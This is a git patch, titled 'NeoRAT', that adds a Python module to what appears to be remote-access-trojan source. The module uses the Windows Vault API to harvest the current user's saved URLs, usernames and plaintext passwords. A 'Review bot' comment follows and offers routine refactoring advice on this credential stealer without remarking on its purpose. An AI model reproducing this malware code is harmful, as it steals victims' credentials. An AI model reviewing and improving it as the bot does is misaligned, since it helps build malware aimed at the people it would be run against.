From 20dbeb2f38684c65ff0a4b99012c161295708e88 Mon Sep 17 00:00:00 2001
From: AL-LCL
Date: Fri, 19 May 2023 11:01:49 +0200
Subject: NeoRAT
---
 .../lazagne/softwares/windows/vault.py | 71 ++++++++++++++++++++++
 1 file changed, 71 insertions(+)
 create mode 100644 foreign/client_handling/lazagne/softwares/windows/vault.py
(limited to 'foreign/client_handling/lazagne/softwares/windows/vault.py')
diff --git a/foreign/client_handling/lazagne/softwares/windows/vault.py b/foreign/client_handling/lazagne/softwares/windows/vault.py
new file mode 100644
index 0000000..9c8e8cc
--- /dev/null
+++ b/foreign/client_handling/lazagne/softwares/windows/vault.py
@@ -0,0 +1,71 @@
+# -*- coding: utf-8 -*-
+from foreign.client_handling.lazagne.config.module_info import ModuleInfo
+from foreign.client_handling.lazagne.config.winstructure import *
+from ctypes.wintypes import *
+
+
+class Vault(ModuleInfo):
+ def __init__(self):
+ ModuleInfo.__init__(self, 'vault', 'windows', only_from_current_user=True)
+
+ def run(self):
+
+ # retrieve passwords (IE, etc.) using the Windows Vault API
+ if float(get_os_version()) <= 6.1:
+ self.info(u'Vault not supported for this OS')
+ return
+
+ cbVaults = DWORD()
+ vaults = LPGUID()
+ hVault = HANDLE(INVALID_HANDLE_VALUE)
+ cbItems = DWORD()
+ items = c_char_p()
+ pwd_found = []
+
+ if vaultEnumerateVaults(0, byref(cbVaults), byref(vaults)) == 0:
+ if cbVaults.value == 0:
+ self.debug(u'No Vaults found')
+ return
+ else:
+ for i in range(cbVaults.value):
+ if vaultOpenVault(byref(vaults[i]), 0, byref(hVault)) == 0:
+ if hVault:
+ if vaultEnumerateItems(hVault, 0x200, byref(cbItems), byref(items)) == 0:
+
+ for j in range(cbItems.value):
+
+ items8 = cast(items, POINTER(VAULT_ITEM_WIN8))
+ pItem8 = PVAULT_ITEM_WIN8()
+ try:
+ values = {
+ 'URL': str(items8[j].pResource.contents.data.string),
+ 'Login': str(items8[j].pUsername.contents.data.string)
+ }
+ if items8[j].pName:
+ values['Name'] = items8[j].pName
+
+ if vaultGetItem8(hVault, byref(items8[j].id), items8[j].pResource,
+ items8[j].pUsername, items8[j].unknown0, None, 0,
+ byref(pItem8)) == 0:
+
+ password = pItem8.contents.pPassword.contents.data.string
+ # Remove password too long
+ if password and len(password) < 100:
+ values['Password'] = password
+
+ pwd_found.append(values)
+
+ except Exception as e:
+ self.debug(e)
+
+ if pItem8:
+ vaultFree(pItem8)
+
+ if items:
+ vaultFree(items)
+
+ vaultCloseVault(byref(hVault))
+
+ vaultFree(vaults)
+
+ return pwd_found
--
cgit v1.2.3
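Review bot: The cast `items8 = cast(items, POINTER(VAULT_ITEM_WIN8))` in run() does not depend on the loop variable, yet it is redone on every pass of `for j in range(cbItems.value)`; moving that single line to just after the successful vaultEnumerateItems call, before the loop, keeps the per-item block focused on the item itself. The `0x200` passed to vaultEnumerateItems is an unexplained magic number; a named module-level constant with a comment, e.g. `VAULT_ENUMERATE_ITEMS_FLAGS = 0x200  # flags argument to VaultEnumerateItems; see the Vault API reference`, would tell a reader what is being requested. The OS gate `float(get_os_version()) <= 6.1` assumes get_os_version() returns a string float() can parse; if it can ever yield a three-component version, the conversion raises ValueError before the "not supported" message is reached, which is worth confirming against winstructure (not in this hunk). The whole of run() lies inside the hunk, so the suggested hoist is self-contained.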